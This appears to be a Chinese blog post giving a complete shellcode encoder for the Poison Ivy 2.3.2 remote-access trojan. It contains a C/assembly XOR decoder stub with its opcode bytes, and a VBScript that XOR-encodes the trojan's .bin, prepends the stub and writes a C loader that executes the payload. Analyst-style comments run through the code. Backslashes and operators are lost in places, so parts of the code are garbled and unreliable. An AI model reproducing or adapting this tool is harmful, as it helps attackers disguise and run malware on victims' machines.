xor shellcode for Poison Ivy 2.3.2 bin
From vbs小铺blog
=======================================================================================================================
用c代码和汇编得到一个xor &h21 的解码头的示例代码
#include <string.h>
#include <stdio.h>
/*
 * Harness that assembles the XOR-0x21 decoder stub as MSVC inline asm.
 * Nothing after the stub is present here; the page reads the emitted opcode
 * bytes back out of a disassembler (the byte string under this listing) and
 * uses them as the prefix placed in front of the encoded payload.
 * From an analysis standpoint: the jmp/call/pop address-discovery trick
 * followed by an in-place XOR over the bytes that follow the stub is the
 * structure to recognise when triaging a sample of this kind.
 */
int main()
{
__asm
{
jmp decode_end // jump forward so that "call decode_start" pushes the address of decode_ok
decode_start:
pop edx // edx = return address pushed by the call = address of decode_ok (esp -> edx)
dec edx // pre-decrement: the loop indexes [edx+ecx] with ecx counting down to 1, never 0
xor ecx,ecx
mov cx,0x2134 // number of bytes to decode; 0x2134 = 8500, an upper bound on the payload length
decode_loop:
xor byte ptr [edx+ecx], 0x21 // the encoder used key 0x21, so XOR with the same key restores each byte
loop decode_loop // ecx--, repeat while ecx != 0
jmp decode_ok // decoding finished; continue into the now-decoded bytes after decode_ok
decode_end:
call decode_start
decode_ok: // the encoded payload is appended immediately after this label
}
return 0;
}
od反汇编得到decode的解码头为:"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x34\x21\x80\x34\x0A\x21\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF"
==============================================================================================================================
' Host check: the script prints to the console, so it refuses to run under the
' GUI host wscript.exe (where each Echo becomes a dialog box) and asks for cscript.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end if
' With no arguments at all, print the usage text and exit.
' Only the zero-argument case is checked here; arg(1) and arg(2) are used
' further down without any count check, so fewer than three arguments fails later.
if Wscript.Arguments.count=0 Then
usage()
wscript.quit
End If
10进制转16进制函数
' Converts a positive number to an uppercase hexadecimal string, one nibble per
' iteration via "Mod 16". Returns "" when Dec is 0 or negative (loop never runs).
' NOTE(review): the line "Dec = Dec 16" has lost its operator; the loop only
' terminates if it is integer division (`\`), which the page as extracted
' appears to have dropped - confirm against the original source.
Function Dec2Hex(Dec)
Dec2Hex = ""
Do While Dec > 0
a = CStr(Dec Mod 16) ' current least-significant nibble as decimal text
Select Case a
Case "10": a = "A"
Case "11": a = "B"
Case "12": a = "C"
Case "13": a = "D"
Case "14": a = "E"
Case "15": a = "F"
End Select
Dec2Hex = a & Dec2Hex ' prepend, since nibbles are produced low-order first
Dec = Dec 16
Loop
End Function
' (section heading) Function that reads a binary file
' Reads the whole file at sStr as binary through ADODB.Stream and returns its
' contents as an uppercase hex string, two characters per byte (0x0A -> "0A").
' Despite the name, nothing here is GIF-specific; any file path works.
Function ReadGif(sStr)
Dim i, iHex, sPath, oStream ' sPath is declared but never used
Set oStream = CreateObject("Adodb.Stream")
oStream.Type = 1 ' 1 = adTypeBinary
oStream.Open
oStream.LoadFromFile sStr
' The loop bound reads the stream once to learn its length; every iteration then
' rewinds and re-reads the whole stream to pick out byte i, so this is quadratic
' in the file size (acceptable for the small inputs this script targets).
For i = 1 To LenB(oStream.Read())
oStream.Position = 0
iHex = Hex(AscB(MidB(oStream.Read(), i, 1)))
If Len(iHex) = 1 Then iHex = "0" & iHex ' zero-pad to two hex digits
ReadGif = ReadGif & iHex
Next
oStream.Close
Set oStream = Nothing
End Function
' (section heading) Function that splits a string into chunks and joins them
' Splits sSource into consecutive pieces of iLong characters (the last piece may
' be shorter) and joins them with sJoiner. An empty sSource yields no pieces and
' the function result is left unassigned, exactly as before.
Function CutAndJoin(sSource, iLong, sJoiner)
    Dim nChunks, k, pieces
    ' Number of pieces, rounding any fractional remainder up to a whole piece.
    nChunks = Len(sSource) / iLong
    If nChunks <> Fix(nChunks) Then nChunks = Fix(nChunks) + 1
    If nChunks > 0 Then
        ReDim pieces(nChunks - 1)
        For k = 0 To nChunks - 1
            pieces(k) = Mid(sSource, k * iLong + 1, iLong)
        Next
        ' Join inserts sJoiner only between pieces, so no trailing joiner to trim.
        CutAndJoin = Join(pieces, sJoiner)
    End If
End Function
' Main pipeline: read the input file (arg 0) as hex pairs, XOR each byte with the
' key given as a hex number in arg 1, then prepend the decoder stub bytes.
Set Arg=Wscript.Arguments
' NOTE(review): the "x" joiner and the "xEB..." strings below read like C "\x"
' escapes whose backslashes were lost when the page was extracted; the C source
' that writef emits would need the escapes to compile - confirm against the original.
tempshellccode=CutAndJoin(ReadGif(arg(0)),2,"x")
shellcode=Split(tempshellccode,"x")
For i=1 To UBound(shellcode)
' Presumably relies on VBScript coercing the "&hXX" strings to numbers for Xor - verify.
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp ' pad to two digits
If temp="" Then temp="00" ' Dec2Hex returns "" for zero
vbshellcode=vbshellcode&"x"&temp
Next
' Decoder stub from the C listing above; the key byte of its "xor byte ptr" instruction
' (the "x21" after "x80x34x0A") is replaced by arg 1 so stub and encoding use the same key.
decode="xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax"&arg(1)&"xE2xFAxEBx05xE8xEBxFFxFFxFF"
decode=decode&LCase(vbshellcode)
WScript.Echo CutAndJoin(decode, 80, Chr(13)) ' 80 is a multiple of 4, which keeps the output lined up
' Writes a minimal C source file to the path in cpp: the script-level string
' "decode" as a char array split into 80-character string literals, plus a
' main() that casts the array to a function pointer and calls it.
' Reads the script-level variable decode; the target file is created or overwritten.
Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true) ' 2 = ForWriting, true = create if missing
.writeline "#include<windows.h>"
.writeline "char ShellCode[]="
' Each 80-char chunk is wrapped in quotes on its own line; adjacent C string literals concatenate.
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
.writeline "{"
.writeline " ( (void(*)(void)) &ShellCode)();"
.writeline "return 0;"
.writeline "}"
.close
End with
Set fso = Nothing
End Function
writef(arg(2)) ' arg 2: output C source path
' Returns True when str names an existing file, False otherwise.
' Keeps the script-level FSO variable as the object holder, as the rest of the file does.
Function Findfile(str)
    Set FSO = CreateObject("Scripting.FileSystemObject")
    ' FileExists already yields a Boolean, so no If/Else is needed.
    Findfile = FSO.FileExists(str)
End Function
' Report success only if the output file actually exists on disk.
' (Message reads: "generated the C-format file <arg 2>".)
If Findfile(arg(2))=True then
wsh.echo "已生成"&arg(2)&"的c语言格式文件"
End if
function usage()
wscript.echo "+--codz By lcx ^^ shellcode xor for Poison Ivy 2.3.2 vbscript-------+"
wscript.echo "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+"
wscript.echo "|Useage: |"
wscript.echo "| cscript.exe shellcode.vbs x.bin xorhexnum test.cpp |"
wscript.echo "|ex: |"
wscript.echo "| cscript.exe shellcode.vbs c:PoisonIvy.bin 21 c: est.c